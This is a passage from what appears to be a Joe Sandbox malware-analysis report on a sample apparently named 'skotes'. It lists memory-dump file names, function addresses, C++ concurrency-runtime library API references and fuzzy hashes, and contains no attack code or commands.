Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: a1aafa85dc522e5b6982cc2e3e1884c266ee6af940375b01be82403b3dc7a07d
Instruction ID: df648256689403618ac4d75bbc83fb83ddaa5777fc7e92da9b999cbe8c763c79
Opcode Fuzzy Hash: a1aafa85dc522e5b6982cc2e3e1884c266ee6af940375b01be82403b3dc7a07d
Instruction Fuzzy Hash: BE21DA77901614DFDB15EFA4D982EADB7F4EF85314F208065F009AB2A1DB316D41CB51

Function 0097A026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0097A069

Part of subcall function 0097B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0097B5AF

Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0097A07F
Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0097A0CB

Part of subcall function 0097AB41: List.LIBCONCRT ref: 0097AB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0097A0DB

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
String ID:
API String ID: 932774601-0
Opcode ID: 30f4160e7dc81a9c2102b6961a6b5055e63f5bdde64f4a69bc41fea9bf7a092f
Instruction ID: 58d11e1c6cca79b3d021fc65ba44d89dee6fe50a971058a6a7fb121f8072a53f
Opcode Fuzzy Hash: 30f4160e7dc81a9c2102b6961a6b5055e63f5bdde64f4a69bc41fea9bf7a092f
Instruction Fuzzy Hash: 6421BA32500A149FCB24EF65C9909AFF3F9FF88700700895EE44AA7661DB34F901CBA2

Function 00974885 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00974893
ListArray.LIBCONCRT ref: 009748A5

Part of subcall function 00975555: _InternalDeleteHelper.LIBCONCRT ref: 00975564

ListArray.LIBCONCRT ref: 009748AF
_InternalDeleteHelper.LIBCONCRT ref: 009748C8

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 47bfe197414e9908cdbc16072b972a96e3471c6e4aa705bb9b85dd47c8926547
Instruction ID: 386caad01acd176f0af61672a835c57c4dab2a8d0927e71215cff53af5b4ba20
Opcode Fuzzy Hash: 47bfe197414e9908cdbc16072b972a96e3471c6e4aa705bb9b85dd47c8926547
Instruction Fuzzy Hash: CF01F272B01521AFCA217B65D886FADB72ABFC47103014029F41857616DB60E821C7A2

Function 0097EE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0097EE6A
ListArray.LIBCONCRT ref: 0097EE7C

Part of subcall function 0097EF29: _InternalDeleteHelper.LIBCONCRT ref: 0097EF3B

ListArray.LIBCONCRT ref: 0097EE86
_InternalDeleteHelper.LIBCONCRT ref: 0097EE9F

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: cf0d7afac775e85aa710fca3de0c8adc2269e91091270fe0b2cfb5694f9988a7
Instruction ID: 268802d98c5b743029376752bde05031f5fcdb9f20fa3932952d159c277731f7
Opcode Fuzzy Hash: cf0d7afac775e85aa710fca3de0c8adc2269e91091270fe0b2cfb5694f9988a7
Instruction Fuzzy Hash: A701D633701521AFCA257B65D8C6F7EBB6EBFC9710740406AF44857651CB20EC1187D2

Function 0097D0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0097D0C5
ListArray.LIBCONCRT ref: 0097D0D7

Part of subcall function 0097C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0097C6C4

ListArray.LIBCONCRT ref: 0097D0E1
_InternalDeleteHelper.LIBCONCRT ref: 0097D0FA

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: f4f1243cd35a8db013a73f333d8baa4bb5ffe19013b05abe21f71435bd5db9b6
Instruction ID: 9b561018b586ae073a3620d3a456db3cb4d8d590c3f114173c2ba9058c5caccb
Opcode Fuzzy Hash: f4f1243cd35a8db013a73f333d8baa4bb5ffe19013b05abe21f71435bd5db9b6
Instruction Fuzzy Hash: C4012673702521AFCA257B61C8C6F6DB77ABFC5710740902AF40897601DF20EC5187D1

